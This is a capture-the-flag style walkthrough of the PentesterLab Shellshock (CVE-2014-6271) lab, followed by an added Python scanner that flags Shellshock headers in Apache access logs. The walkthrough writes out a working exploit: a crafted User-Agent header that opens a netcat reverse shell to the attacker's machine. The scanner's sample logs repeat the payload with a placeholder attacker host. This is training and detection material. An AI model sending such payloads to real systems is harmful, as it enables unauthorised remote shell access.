Pentesterlab--CVE-2014-6271/Shellshock

So it is said that if you know your enemies and know yourself, you will not be put at risk even if you have a hundred battles. -- The Art of War

This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

Difficulty: 1/5

Forces:

  • Nmap
  • Burp
  • Firebug
  • NC

Detail Assessment and Planning

  • Port scan to identify open ports, running services and service versions (Nmap)
  • Identify the vulnerability and the path /cgi-bin/status (Burp, Firebug)
  • Exploit the Shellshock vulnerability to get a reverse shell (nc)

Waging War

Weaknesses and Strengths

Used Nmap to identify open ports. TCP port 80 is open and an Apache service is running on it.

By visiting the application with Burp, I can detect that multiple URLs are accessed when the page is loaded.

Also, by using Firebug, I can identify the CGI page /cgi-bin/status, which calls a system command.

Attack

Listen on port 443:

# nc -l -p 443

Exploit:
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.79.156 443 -e /bin/sh\r\nHost: 192.168.79.164\r\nConnection: close\r\n\r\n" | nc 192.168.79.164 80

192.168.79.156 is the attacker's machine and 192.168.79.164 is the victim machine.
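A defender-side check for the header pattern used above, added here as an example and not part of the original write-up: it scans Apache combined-format access log lines and flags any whose Referer or User-Agent carries the bash function-definition prefix ("() {") that a CGI handler would copy into bash's environment. The log lines and the ATTACKER_IP placeholder are constructed, not taken from the lab.

```python
import re
from typing import Dict, List

# A Shellshock payload is a bash function definition smuggled in through an
# environment variable, e.g. "() { :;}; <command>". CGI copies request headers
# such as User-Agent and Referer into the environment, which is how the header
# reaches bash. Whitespace is matched loosely on purpose: we prefer a false
# positive to missing a spaced-out variant.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

def is_shellshock_payload(value: str) -> bool:
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None

# Apache combined log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per log line whose Referer or User-Agent carries a payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        for field in ("referer", "ua"):
            if is_shellshock_payload(m.group(field)):
                findings.append({"ip": m.group("ip"), "request": m.group("request"),
                                 "field": field, "value": m.group(field)})
                break  # one finding per line is enough for triage
    return findings

# Constructed sample log lines (not from the original page). The second line
# mirrors the HEAD request shown above; ATTACKER_IP is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Sep/2014:10:00:07 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /usr/bin/nc ATTACKER_IP 443 -e /bin/sh"',
    '10.0.0.7 - - [24/Sep/2014:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "() { :; }; /bin/true" "curl/7.35.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['request']} via {f['field']}: {f['value']}")
```

Note that a HEAD request that returned 200 with no body still reaches the CGI script, so the status code alone says nothing; the header content is what to alert on.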